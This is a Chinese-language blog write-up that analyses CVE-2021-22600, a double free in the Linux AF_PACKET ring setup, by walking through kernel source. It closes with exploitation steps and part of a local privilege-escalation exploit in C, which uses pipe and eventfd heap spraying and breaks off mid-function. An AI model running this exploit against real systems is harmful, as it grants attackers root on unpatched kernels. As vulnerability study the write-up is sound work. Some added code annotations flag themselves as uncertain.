CVE-2021-22600 Linux内核提权漏洞分析及其延伸利用手法(USMA)研究

0rb1t Lv2

0x00.前言

研究这个CVE的契机是这次2024强网拟态杯的一道内核题,开启内核cg隔离的情况下的0x40堆uaf利用。

当时的想法是先堆喷pipe_buffer,然后利用poll_list释放pipe_buffer,再去打DirtyPipe,可惜在开启了kaslr的环境,很难预测到pipe_buffer的地址,最后只能放弃。

比赛结束后看到其他佬的wp,基本上都是利用user_key_payload泄露内核基地址,再去打usma实现提权。而我却连usma是什么都不知道,故做此文章记录学习过程。

0x01.源码分析

在我看来,读源码是了解漏洞以及利用手法产生原理最有效的方法之一,所以源码分析的内容会偏多一点。

本篇使用的源码版本为linux 5.15.1。

socket

__sys_socket函数先是调用sock_create创建并初始化socket结构体,然后调用sock_map_fd为其绑定文件描述符。

1
2
3
4
5
6
7
8
9
10
11
12
13
int __sys_socket(int family, int type, int protocol)
{
int retval;
struct socket *sock;
int flags;

...
retval = sock_create(family, type, protocol, &sock);
if (retval < 0)
return retval;

return sock_map_fd(sock, flags & (O_CLOEXEC | O_NONBLOCK));
}

继续跟进sock_create->__sock_create,可以看到其会优先调用sock_alloc()申请并简单初始化socket结构体,然后根据传入的family选择对应的net_proto_family结构体,再调用pf->create进行操作。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
int __sock_create(struct net *net, int family, int type, int protocol,
struct socket **res, int kern)
{
int err;
struct socket *sock;
const struct net_proto_family *pf;
...
sock = sock_alloc();
if (!sock) {
net_warn_ratelimited("socket: no more sockets\n");
return -ENFILE; /* Not exactly a match, but its the
closest posix thing */
}
sock->type = type;

rcu_read_lock();
//net_families通过sock_register注册
pf = rcu_dereference(net_families[family]);
...
//调用对应family的create函数
err = pf->create(net, sock, protocol, kern);
...
*res = sock;

return 0;
}

根据引用查找可以看到net_families初始化的位置在sock_register,rcu_assign_pointer会在net_families为传入的ops设置一个坑位。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
//file: net/socket.c
int sock_register(const struct net_proto_family *ops)
{
int err;

if (ops->family >= NPROTO) {
pr_crit("protocol %d >= NPROTO(%d)\n", ops->family, NPROTO);
return -ENOBUFS;
}

spin_lock(&net_family_lock);
if (rcu_dereference_protected(net_families[ops->family],
lockdep_is_held(&net_family_lock)))
err = -EEXIST;
else {
//调用rcu_assign_pointer把ops置入net_families
rcu_assign_pointer(net_families[ops->family], ops);
err = 0;
}
spin_unlock(&net_family_lock);

pr_info("NET: Registered %s protocol family\n", pf_family_names[ops->family]);
return err;
}

继续查找引用,可以找到packet_init会调用sock_register进行初始化,所以我们可以通过PF_PACKET的family标志调用packet_create函数。

其他family也有各自对应的ops,不过这里我们研究的漏洞产生点位于af_packet.c中,所以选择研究packet_create函数。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
//file: net/packet/af_packet.c
static const struct net_proto_family packet_family_ops = {
.family = PF_PACKET,
.create = packet_create,
.owner = THIS_MODULE,
};
static int __init packet_init(void)
{
int rc;

rc = proto_register(&packet_proto, 0);
if (rc)
goto out;
rc = sock_register(&packet_family_ops);
...
return rc;
}
module_init(packet_init);

packet_create整体就是申请一些结构体并初始化,这里要注意的是sock->ops的初始化,后续setsockopt会调用这个ops中的函数。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
// file: net/packet/af_packet.c
/*
 * packet_create() - the .create handler registered for PF_PACKET (excerpt;
 * "..." marks code elided by the article).
 *
 * Requires CAP_NET_RAW in the network namespace's user namespace, accepts only
 * SOCK_DGRAM / SOCK_RAW / SOCK_PACKET, allocates the struct sock and installs
 * the proto_ops table that later socket calls dispatch through.
 */
static int packet_create(struct net *net, struct socket *sock, int protocol,
int kern)
{
struct sock *sk;
struct packet_sock *po;
__be16 proto = (__force __be16)protocol; /* weird, but documented */
int err;

if (!ns_capable(net->user_ns, CAP_NET_RAW))
return -EPERM;
// The socket type must be one of the three accepted values.
if (sock->type != SOCK_DGRAM && sock->type != SOCK_RAW &&
sock->type != SOCK_PACKET)
return -ESOCKTNOSUPPORT;

sock->state = SS_UNCONNECTED;
err = -ENOBUFS;
// Allocate the struct sock for packet_proto (presumably from that proto's
// own slab cache -- confirm against sk_alloc()).
sk = sk_alloc(net, PF_PACKET, GFP_KERNEL, &packet_proto, kern);
if (sk == NULL)
goto out;
// Key point: a later setsockopt() on this socket is dispatched through
// the handlers in this ops table.
sock->ops = &packet_ops;
// SOCK_PACKET sockets get packet_ops_spkt instead, so a different type
// must be used to keep packet_ops.
if (sock->type == SOCK_PACKET)
sock->ops = &packet_ops_spkt;
...
return err;
}
static const struct proto_ops packet_ops = {
.family = PF_PACKET,
.owner = THIS_MODULE,
.release = packet_release,
.bind = packet_bind,
.connect = sock_no_connect,
.socketpair = sock_no_socketpair,
.accept = sock_no_accept,
.getname = packet_getname,
.poll = packet_poll,
.ioctl = packet_ioctl,
.gettstamp = sock_gettstamp,
.listen = sock_no_listen,
.shutdown = sock_no_shutdown,
.setsockopt = packet_setsockopt,
.getsockopt = packet_getsockopt,
.sendmsg = packet_sendmsg,
.recvmsg = packet_recvmsg,
.mmap = packet_mmap,
.sendpage = sock_no_sendpage,
};

可以看到socket系统调用整体就是创建和初始化的过程,这也是我们了解漏洞调用链的第一步。

setsockopt

__sys_setsockopt会先将传入的fd转化成socket结构体,然后根据level选择性地调用对应的setsockopt处理函数。我们需要调用的是af_packet.c中的函数,所以将level设置为SOL_PACKET,使其调用sock->ops->setsockopt函数指针。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
//file: net/socket.c
int __sys_setsockopt(int fd, int level, int optname, char __user *user_optval,
int optlen)
{
sockptr_t optval = USER_SOCKPTR(user_optval);
char *kernel_optval = NULL;
int err, fput_needed;
struct socket *sock;

if (optlen < 0)
return -EINVAL;
//通过fd寻找socket结构体
sock = sockfd_lookup_light(fd, &err, &fput_needed);
...
//这里会根据情况选择处理函数,我们需要将level置为非SOL_SOCKET而是SOL_PACKET
if (level == SOL_SOCKET && !sock_use_custom_sol_socket(sock))
err = sock_setsockopt(sock, level, optname, optval, optlen);
else if (unlikely(!sock->ops->setsockopt))
err = -EOPNOTSUPP;
else
err = sock->ops->setsockopt(sock, level, optname, optval,
optlen);
...
return err;
}

根据packet_ops中的函数指针找到指定的setsockopt函数,可以看到它会根据设置的optname进行分支选择,而我们要关注的就是PACKET_TX_RING操作,它会调用packet_set_ring函数建立环形缓冲区,类似于pipe_buffer那种。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
//file: net/packet/af_packet.c
static int
packet_setsockopt(struct socket *sock, int level, int optname, sockptr_t optval,
unsigned int optlen)
{
struct sock *sk = sock->sk;
struct packet_sock *po = pkt_sk(sk);
int ret;

if (level != SOL_PACKET)
return -ENOPROTOOPT;

switch (optname) {
...
case PACKET_RX_RING:
case PACKET_TX_RING:
{
union tpacket_req_u req_u;
int len;

lock_sock(sk);
switch (po->tp_version) {
//这里是版本选择,后续漏洞利用也和这个有关
case TPACKET_V1:
case TPACKET_V2:
//不同版本结构体大小不一样
len = sizeof(req_u.req);
break;
case TPACKET_V3:
default:
len = sizeof(req_u.req3);
break;
}
if (optlen < len) {
ret = -EINVAL;
} else {
//copy_from_user一样
if (copy_from_sockptr(&req_u.req, optval, len))
ret = -EFAULT;
else
//建立环形缓冲区,关键函数
ret = packet_set_ring(sk, &req_u, 0,
optname == PACKET_TX_RING);
}
release_sock(sk);
return ret;
}
...
}

跟进packet_set_ring函数

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
// file: net/packet/af_packet.c
/*
 * packet_set_ring() - validate a ring request and install, replace or tear
 * down the RX or TX ring of a packet socket (excerpt; "..." marks code elided
 * by the article).
 *
 * @sk:      packet socket
 * @req_u:   ring request (V1/V2 layout via ->req, V3 layout via ->req3)
 * @closing: non-zero skips the "mapped / pending" busy checks
 * @tx_ring: non-zero selects po->tx_ring, zero selects po->rx_ring
 *
 * Returns 0 on success or a negative errno.
 */
static int packet_set_ring(struct sock *sk, union tpacket_req_u *req_u,
int closing, int tx_ring)
{
struct pgv *pg_vec = NULL;
struct packet_sock *po = pkt_sk(sk);
unsigned long *rx_owner_map = NULL;
int was_running, order = 0;
struct packet_ring_buffer *rb;
struct sk_buff_head *rb_queue;
__be16 num;
int err;
/* Added to avoid minimal code churn */
struct tpacket_req *req = &req_u->req;
// Pick the ring (and its queue) to operate on: tx_ring selects the transmit
// ring, otherwise the receive ring is used.
rb = tx_ring ? &po->tx_ring : &po->rx_ring;
rb_queue = tx_ring ? &sk->sk_write_queue : &sk->sk_receive_queue;

err = -EBUSY;
if (!closing) {
if (atomic_read(&po->mapped))
goto out;
// Bail out while packet_read_pending() reports outstanding references on
// this ring (presumably in-flight frames -- confirm).
if (packet_read_pending(rb))
goto out;
}
// tp_block_nr is the number of blocks requested (not pages); a non-zero
// value means "create a ring", zero means "tear the ring down".
if (req->tp_block_nr) {
unsigned int min_frame_size;

/* Sanity tests and some calculations */
err = -EBUSY;
// A ring that already has a pg_vec cannot be configured again.
if (unlikely(rb->pg_vec))
goto out;
// The header length depends on the TPACKET version.
switch (po->tp_version) {
case TPACKET_V1:
po->tp_hdrlen = TPACKET_HDRLEN;
break;
case TPACKET_V2:
po->tp_hdrlen = TPACKET2_HDRLEN;
break;
case TPACKET_V3:
po->tp_hdrlen = TPACKET3_HDRLEN;
break;
}

err = -EINVAL;
// The block size must be positive when interpreted as an int.
if (unlikely((int)req->tp_block_size <= 0))
goto out;
// The block size must be page aligned.
if (unlikely(!PAGE_ALIGNED(req->tp_block_size)))
goto out;
min_frame_size = po->tp_hdrlen + po->tp_reserve;
// For version V3 and above (>=), each block must also have room for the
// private area plus one minimum-size frame.
if (po->tp_version >= TPACKET_V3 &&
req->tp_block_size <
BLK_PLUS_PRIV((u64)req_u->req3.tp_sizeof_priv) + min_frame_size)
goto out;
// Frame size: at least min_frame_size and a multiple of TPACKET_ALIGNMENT.
if (unlikely(req->tp_frame_size < min_frame_size))
goto out;
if (unlikely(req->tp_frame_size & (TPACKET_ALIGNMENT - 1)))
goto out;
// Number of frames that fit into one block.
rb->frames_per_block = req->tp_block_size / req->tp_frame_size;
// At least one frame per block is required.
if (unlikely(rb->frames_per_block == 0))
goto out;
// Overflow guard: frames_per_block * tp_block_nr must fit in an
// unsigned int (UINT_MAX).
if (unlikely(rb->frames_per_block > UINT_MAX / req->tp_block_nr))
goto out;
// The total frame count must equal the tp_frame_nr supplied by the caller.
if (unlikely((rb->frames_per_block * req->tp_block_nr) !=
req->tp_frame_nr))
goto out;

err = -ENOMEM;
// Page-allocation order needed for one block of tp_block_size bytes.
order = get_order(req->tp_block_size);
// Allocate the pg_vec array and the pages behind every block.
pg_vec = alloc_pg_vec(req, order);
if (unlikely(!pg_vec))
goto out;
switch (po->tp_version) {
case TPACKET_V3:
/* Block transmit is not supported yet */
if (!tx_ring) {
// Origin of the vulnerability: init_prb_bdqc() stores pg_vec inside
// rb->prb_bdqc, which shares a union with rb->rx_owner_map.
init_prb_bdqc(po, rb, pg_vec, req_u);
}
break;
default:
if (!tx_ring) {
rx_owner_map = bitmap_alloc(req->tp_frame_nr,
GFP_KERNEL | __GFP_NOWARN | __GFP_ZERO);
if (!rx_owner_map)
goto out_free_pg_vec;
}
break;
}
}

...
// When closing is set, or the ring is not currently mmap()ed, the old ring
// state is swapped out and the new state installed.
if (closing || atomic_read(&po->mapped) == 0) {
err = 0;
spin_lock_bh(&rb_queue->lock);
swap(rb->pg_vec, pg_vec);// take the previous pg_vec out so it is freed below
if (po->tp_version <= TPACKET_V2)// V1/V2 only: take the previous rx_owner_map out so it is freed below
swap(rb->rx_owner_map, rx_owner_map);
...
}
...
// Free the pg_vec and rx_owner_map that were swapped out above. Only the
// rx_owner_map view of the union is handled here; nothing shown in this
// excerpt clears rb->prb_bdqc, so a pointer stored there by init_prb_bdqc()
// can be left behind.
out_free_pg_vec:
bitmap_free(rx_owner_map);
if (pg_vec)
free_pg_vec(pg_vec, order, req->tp_block_nr);
out:
return err;
}

跟进alloc_pg_vec函数,可以看到,pg_vec是基于我们控制的block_nr申请的,标志位为GFP_KERNEL,因此我们可以申请得到几乎任意大小的堆块。不过pg_vec中每8个字节(一个struct pgv)都会对应申请一个至少一页大小的block,会吃不少内存。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
//file: net/packet/af_packet.c
static struct pgv *alloc_pg_vec(struct tpacket_req *req, int order)
{
unsigned int block_nr = req->tp_block_nr;
struct pgv *pg_vec;
int i;
//申请任意堆块
pg_vec = kcalloc(block_nr, sizeof(struct pgv), GFP_KERNEL | __GFP_NOWARN);
if (unlikely(!pg_vec))
goto out;
//所有page的虚拟地址都存入pg_vec。
for (i = 0; i < block_nr; i++) {
pg_vec[i].buffer = alloc_one_pg_vec_page(order);
if (unlikely(!pg_vec[i].buffer))
goto out_free_pgvec;
}

out:
return pg_vec;

out_free_pgvec:
free_pg_vec(pg_vec, order, block_nr);
pg_vec = NULL;
goto out;
}

再查看产生漏洞的init_prb_bdqc函数,可以看到pg_vec没有任何防备地传递给了rb->prb_bdqc.pkbdq。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
// file: net/packet/af_packet.c

/* Yields a pointer to the tpacket_kbdq_core embedded in a packet_ring_buffer. */
#define GET_PBDQC_FROM_RB(x) ((struct tpacket_kbdq_core *)(&(x)->prb_bdqc))
/*
 * init_prb_bdqc() - initialise the block-descriptor state embedded in @rb
 * from the request in @req_u (excerpt; "..." marks code elided by the
 * article). The state is zeroed first and then filled in field by field.
 */
static void init_prb_bdqc(struct packet_sock *po,
struct packet_ring_buffer *rb,
struct pgv *pg_vec,
union tpacket_req_u *req_u)
{
struct tpacket_kbdq_core *p1 = GET_PBDQC_FROM_RB(rb);
struct tpacket_block_desc *pbd;

memset(p1, 0x0, sizeof(*p1));

p1->knxt_seq_num = 1;
p1->pkbdq = pg_vec;// pg_vec is stored in rb->prb_bdqc.pkbdq (prb_bdqc is an embedded struct, not a pointer)
pbd = (struct tpacket_block_desc *)pg_vec[0].buffer;
p1->pkblk_start = pg_vec[0].buffer;
p1->kblk_size = req_u->req3.tp_block_size;
p1->knum_blocks = req_u->req3.tp_block_nr;
p1->hdrlen = po->tp_hdrlen;
p1->version = po->tp_version;
p1->last_kactive_blk_num = 0;
...
}

我们再查看rb的结构体,能够发现rx_owner_map和prb_bdqc处于同一个union中,且prb_bdqc.pkbdq指针(保存的就是pg_vec)在prb_bdqc中的偏移为0,刚好和rx_owner_map指针重合。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
struct packet_ring_buffer {
struct pgv *pg_vec;

unsigned int head;
unsigned int frames_per_block;
unsigned int frame_size;
unsigned int frame_max;

unsigned int pg_vec_order;
unsigned int pg_vec_pages;
unsigned int pg_vec_len;

unsigned int __percpu *pending_refcnt;

union {
unsigned long *rx_owner_map;
struct tpacket_kbdq_core prb_bdqc;
};
};
struct tpacket_kbdq_core {
struct pgv *pkbdq;
unsigned int feature_req_word;
unsigned int hdrlen;
...
}

综合以上分析,可以看到,漏洞点在于没有对rb->prb_bdqc进行清空操作,并且在释放rx_owner_map时没有进行check,从而造成了double free漏洞。

mmap

因为要涉及usma的漏洞利用,所以顺便分析一下mmap系统调用,先推荐个非常详细的mmap分析文章

sys_mmap->do_mmap2->ksys_mmap_pgoff

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
// file: mm/nommu.c
// NOTE(review): this is the no-MMU variant of the function; MMU kernels
// presumably build the ksys_mmap_pgoff() from mm/mmap.c instead -- confirm
// which one applies to the analysed target.
/*
 * ksys_mmap_pgoff() - resolve the file descriptor (for non-anonymous
 * mappings) and hand the request to vm_mmap_pgoff().
 *
 * Returns the value produced by vm_mmap_pgoff(), or -EBADF when fget() fails.
 */
unsigned long ksys_mmap_pgoff(unsigned long addr, unsigned long len,
unsigned long prot, unsigned long flags,
unsigned long fd, unsigned long pgoff)
{
struct file *file = NULL;
unsigned long retval = -EBADF;

audit_mmap_fd(fd, flags);
// Only when MAP_ANONYMOUS is NOT set is fd resolved to a struct file, so a
// socket mapping must be requested without MAP_ANONYMOUS.
if (!(flags & MAP_ANONYMOUS)) {
file = fget(fd);
if (!file)
goto out;
}

retval = vm_mmap_pgoff(file, addr, len, prot, flags, pgoff);

if (file)
fput(file);
out:
return retval;
}

vm_mmap_pgoff函数调用do_mmap

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
// file: mm/mmap.c
/*
 * do_mmap() - validate an mmap request, pick the target address and delegate
 * the actual mapping to mmap_region() (excerpt; "..." marks code elided by
 * the article, which is why the braces shown here do not balance).
 *
 * Returns the mapped address or an error value (see IS_ERR_VALUE()).
 * *populate is set to len when the mapping should be pre-populated.
 */
unsigned long do_mmap(struct file *file, unsigned long addr,
unsigned long len, unsigned long prot,
unsigned long flags, unsigned long pgoff,
unsigned long *populate, struct list_head *uf)
{
struct mm_struct *mm = current->mm;
vm_flags_t vm_flags;
int pkey = 0;

*populate = 0;
...
// Without MAP_FIXED the requested address is passed through
// round_hint_to_min().
// NOTE(review): the original annotation described this as
// min(addr, mmap_min_addr); the helper appears to do the opposite and raise
// a non-NULL hint below mmap_min_addr up to it -- confirm in mm/mmap.c.
if (!(flags & MAP_FIXED))
addr = round_hint_to_min(addr);
/* Obtain the address to map to. we verify (or select) it and ensure
* that it represents a valid section of the address space.
*/
// Presumably dispatches to file->f_op->get_unmapped_area or
// current->mm->get_unmapped_area to find a free virtual range -- confirm.
addr = get_unmapped_area(file, addr, len, pgoff, flags);
if (IS_ERR_VALUE(addr))
return addr;

// With MAP_FIXED_NOREPLACE, fail with -EEXIST if an existing VMA intersects
// the requested range.
if (flags & MAP_FIXED_NOREPLACE) {
if (find_vma_intersection(mm, addr, addr + len))
return -EEXIST;
}

...

if (file) {
struct inode *inode = file_inode(file);
unsigned long flags_mask;

if (!file_mmap_ok(file, inode, pgoff, len))
return -EOVERFLOW;

flags_mask = LEGACY_MAP_MASK | file->f_op->mmap_supported_flags;

switch (flags & MAP_TYPE) {
...
case MAP_PRIVATE:
if (!(file->f_mode & FMODE_READ))
return -EACCES;
if (path_noexec(&file->f_path)) {
if (vm_flags & VM_EXEC)
return -EPERM;
vm_flags &= ~VM_MAYEXEC;
}
// On the MAP_PRIVATE path shown here the file must provide f_op->mmap,
// otherwise -ENODEV is returned.
if (!file->f_op->mmap)
return -ENODEV;
if (vm_flags & (VM_GROWSDOWN|VM_GROWSUP))
return -EINVAL;
break;

default:
return -EINVAL;
}
...
// Hand over to mmap_region() to create the mapping.
addr = mmap_region(file, addr, len, vm_flags, pgoff, uf);
if (!IS_ERR_VALUE(addr) &&
((vm_flags & VM_LOCKED) ||
(flags & (MAP_POPULATE | MAP_NONBLOCK)) == MAP_POPULATE))
*populate = len;
return addr;
}

跟进mmap_region函数,可以看到调用了file->f_op->mmap函数。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
//file: mm/mmap.c
unsigned long mmap_region(struct file *file, unsigned long addr,
unsigned long len, vm_flags_t vm_flags, unsigned long pgoff,
struct list_head *uf)
{
struct mm_struct *mm = current->mm;
struct vm_area_struct *vma, *prev, *merge;
int error;
struct rb_node **rb_link, *rb_parent;
unsigned long charged = 0;

/* Check against address space limit. */
...

//vma页合并,加了vma虚拟页合并的操作,基于文件物理页的操作还是一样的
vma = vma_merge(mm, prev, addr, addr + len, vm_flags,
NULL, file, pgoff, NULL, NULL_VM_UFFD_CTX);
if (vma)
goto out;

/*
* Determine the object being mapped and call the appropriate
* specific mapper. the address has already been validated, but
* not unmapped, but the maps are removed from the list.
*/
vma = vm_area_alloc(mm);
if (!vma) {
error = -ENOMEM;
goto unacct_error;
}

vma->vm_start = addr;
vma->vm_end = addr + len;
vma->vm_flags = vm_flags;
vma->vm_page_prot = vm_get_page_prot(vm_flags);
vma->vm_pgoff = pgoff;

if (file) {
if (vm_flags & VM_SHARED) {
error = mapping_map_writable(file->f_mapping);
if (error)
goto free_vma;
}
//调用file->f_op->mmap
vma->vm_file = get_file(file);
error = call_mmap(file, vma);
...
}

file->f_op由先前的socket系统调用中的sock_map_fd函数赋予,为socket_file_ops,对应的mmap函数为sock_mmap,可以看到其调用了sock->ops->mmap即packet_mmap。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
// file: net/socket.c
// NOTE(review): the original annotation named net/packet/af_packet.c; the
// generic socket file_operations and sock_mmap() are defined in net/socket.c.
/* file_operations table for socket files; .mmap points at sock_mmap(). */
static const struct file_operations socket_file_ops = {
.owner = THIS_MODULE,
.llseek = no_llseek,
.read_iter = sock_read_iter,
.write_iter = sock_write_iter,
.poll = sock_poll,
.unlocked_ioctl = sock_ioctl,
#ifdef CONFIG_COMPAT
.compat_ioctl = compat_sock_ioctl,
#endif
.mmap = sock_mmap,
.release = sock_close,
.fasync = sock_fasync,
.sendpage = sock_sendpage,
.splice_write = generic_splice_sendpage,
.splice_read = sock_splice_read,
.show_fdinfo = sock_show_fdinfo,
};
/*
 * sock_mmap() - forward an mmap on a socket file to the protocol's own
 * handler: the socket is taken from file->private_data and sock->ops->mmap
 * is called with it.
 */
static int sock_mmap(struct file *file, struct vm_area_struct *vma)
{
struct socket *sock = file->private_data;

return sock->ops->mmap(file, sock, vma);
}

跟进packet_mmap可以看到关键代码,循环遍历pg_vec,并将page的物理地址与vma绑定。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
//file: net/packet/af_packet.c
static int packet_mmap(struct file *file, struct socket *sock,
struct vm_area_struct *vma)
{
struct sock *sk = sock->sk;
struct packet_sock *po = pkt_sk(sk);
unsigned long size, expected_size;
struct packet_ring_buffer *rb;
unsigned long start;
int err = -EINVAL;
int i;

...
size = vma->vm_end - vma->vm_start;
if (size != expected_size)
goto out;

start = vma->vm_start;
for (rb = &po->rx_ring; rb <= &po->tx_ring; rb++) {
if (rb->pg_vec == NULL)
continue;
//循环遍历pg_vec中所有内核虚拟地址,然后获取其物理地址,再与用户程序的vma绑定,即一个物理地址绑定两个虚拟地址,从而方便内核和用户迅速传输数据
for (i = 0; i < rb->pg_vec_len; i++) {
struct page *page;
void *kaddr = rb->pg_vec[i].buffer;
int pg_num;

for (pg_num = 0; pg_num < rb->pg_vec_pages; pg_num++) {
page = pgv_to_page(kaddr);
err = vm_insert_page(vma, start, page);
if (unlikely(err))
goto out;
start += PAGE_SIZE;
kaddr += PAGE_SIZE;
}
}
}

atomic_inc(&po->mapped);
vma->vm_ops = &packet_mmap_ops;
err = 0;

out:
mutex_unlock(&po->pg_vec_lock);
return err;
}

由上面的分析可以知道,mmap可以映射socket的环形缓冲区,并且过程是基于pg_vec的,而pg_vec是直接通过GFP_KERNEL标志申请的堆块,故如果我们可以利用堆漏洞控制pg_vec,即可实现对任意内核地址的映射和控制。

0x02.漏洞原理

通过对setsockopt系统调用的linux源码分析可以知道,漏洞点位于packet_set_ring函数,在V3版本创建环形缓冲区后,会将缓冲区结构体pg_vec存入rb->prb_bdqc结构体中,并且在释放环形缓冲区时,free了pg_vec却没有清空rb->prb_bdqc中残留的指针。

而转化成V2版本时,rb->rx_owner_map刚好和rb->prb_bdqc处于同一个union中,版本切换并未做清空处理,导致先前V3残留的pg_vec指针变成了V2的rx_owner_map指针,并且在最后会调用bitmap_free释放该指针,从而造成double free。

0x03.漏洞利用

Step.1

调用socket系统调用创建family为AF_PACKET,type为SOCK_RAW的socket套接字。

Step.2

调用V3版本的setsockopt,设置req->tp_block_nr等参数,创建环形缓冲区。

Step.3

二次调用V3版本的setsockopt,设置req->tp_block_nr参数为0,从而释放原有的缓冲区。

Step.4

堆喷结构体,申请回pg_vec的堆块。

Step.5

调用V2版本的setsockopt,实现double free。

0x04.EXP

exploit.c

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
#define _GNU_SOURCE
#include "exploit.h"
#include <assert.h>
#include <fcntl.h>
#include <linux/if_packet.h>
#include <sched.h>
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/eventfd.h>
#include <sys/ioctl.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

int fpair[2];

/*
 * Enter new user and network namespaces and pin the calling process to CPU 0.
 *
 * unshare() stays best effort, as in the original: a failure is now reported
 * on stderr, but execution continues. A sched_setaffinity() failure is fatal
 * (CHECK prints the failing call and exits).
 */
static void setup_sandbox(void) {
  if (unshare(CLONE_NEWNET | CLONE_NEWUSER) < 0)
    perror("unshare(CLONE_NEWNET | CLONE_NEWUSER)");

  cpu_set_t set;
  CPU_ZERO(&set);
  CPU_SET(0, &set);
  /*
   * The previous form, CHECK(call < 0), tested the 0/1 result of the
   * comparison, which is never negative, so a failure was never detected.
   * Pass the return value itself to CHECK instead.
   */
  CHECK(sched_setaffinity(getpid(), sizeof(set), &set));
}

static void close_prev_fds() {
for (int i = 3; i < 0x9000; ++i) {
if (i != fpair[1])
close(i);
}
}

static void setpipe_sz(struct pipe_rw *p, unsigned int size) {
CHECK(fcntl(p->w, F_SETPIPE_SZ, size));
}

struct pipe_rw *alloc_pipes(exploit_ctx *ctx, int n, bool init_pipes) {
int fd_pair[2];
struct pipe_rw *pipes;

ctx->pipe_data = ctx->pipe_data ? ctx->pipe_data : calloc(1, 0x5000);
pipes = calloc(n, sizeof(*pipes));

for (int i = 0; i < n; ++i) {
CHECK(pipe(fd_pair));
pipes[i].r = fd_pair[0];
pipes[i].w = fd_pair[1];
setpipe_sz(&pipes[i], pipesz(256));
}

if (!init_pipes)
goto pipe_alloc_ret;

for (int i = 0; i < n; ++i) {
if (i < (n - 0x30)) {
CHECK(write(pipes[i].w, ctx->pipe_data, 0x2002));
}
CHECK(write(pipes[i].w, ctx->pipe_data, 2));
}

pipe_alloc_ret:
return pipes;
}

static void release_pipe(struct pipe_rw *p) {
close(p->r);
close(p->w);
}

static int fionread(int fd) {
int len = -1;
while (ioctl(fd, FIONREAD, &len) < 0)
usleep(1000);
return len;
}

static void release_dup_page(exploit_ctx *ctx, struct pipe_rw *p,
struct pipe_rw *q) {
char tmp[0x100];
setpipe_sz(q, pipesz(256));
read(p->r, tmp, 0x100 - 8);
ctx->corrupt = q;
}

static void eventfd_reclaim(exploit_ctx *ctx) {
for (int i = 0; i < NUM_EVFD; ++i)
ctx->evfds[i] = CHECK(eventfd(0x13370000 + i, 0));
CHECK(read(ctx->corrupt->r, ctx->pipe_data, 0x1000)); // Release page
CHECK_V(read(ctx->corrupt->r, ctx->pipe_data, 0x78), 0x78);

if ((ctx->pipe_data_qw[2] >> 0x10) != 0x1337) {
puts("[-] Exploit Failed. Retrying...");
int pid = fork();
if (!pid) {
exploit(); // Can be improved, but seems to be very stable
exit(0);
}
wait(NULL);
exit(0);
}

ctx->eventfd_idx = ctx->pipe_data_qw[2] - 0x13370000;
